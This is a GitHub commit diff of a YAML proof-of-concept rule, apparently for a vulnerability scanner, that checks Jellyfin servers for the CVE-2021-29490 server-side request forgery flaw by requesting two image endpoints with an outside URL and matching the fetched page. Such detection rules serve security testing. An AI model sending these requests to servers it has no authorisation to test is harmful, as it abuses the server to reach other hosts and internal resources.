Skip to content

Commit a9ddda5

Browse files
authored
Update jellyfin-cve-2021-29490.yml (#1632)
1 parent 257ac8a commit a9ddda5

File tree

1 file changed

+18
-11
lines changed

1 file changed

+18
-11
lines changed

pocs/jellyfin-cve-2021-29490.yml

+18-11
Original file line numberDiff line numberDiff line change
@@ -2,15 +2,22 @@ name: poc-yaml-jellyfin-cve-2021-29490
22
manual: true
33
transport: http
44
rules:
5-
r0:
6-
request:
7-
cache: true
8-
method: GET
9-
path: /Images/Remote?imageUrl=http://baidu.com
10-
follow_redirects: true
11-
expression: response.status == 200 && response.body.bcontains(bytes("baidu.com"))
12-
expression: r0()
5+
r0:
6+
request:
7+
cache: true
8+
method: GET
9+
path: /Images/Remote?imageUrl=http://example.com/
10+
follow_redirects: true
11+
expression: response.status == 200 && response.body.bcontains(bytes("This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission."))
12+
r1:
13+
request:
14+
cache: true
15+
method: GET
16+
path: /Items/RemoteSearch/Image?ImageUrl=http://example.com&ProviderName=TheMovieDB
17+
follow_redirects: true
18+
expression: response.status == 200 && response.body.bcontains(bytes("This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission."))
19+
expression: r0() || r1()
1320
detail:
14-
author: 曦shen
15-
links:
16-
- https://mp.weixin.qq.com/s/lZcjStsMKz-VeP-KjU2H7g
21+
author: jarcis-cy(https://github.com/jarcis-cy)
22+
links:
23+
- https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96

0 commit comments

Comments
 (0)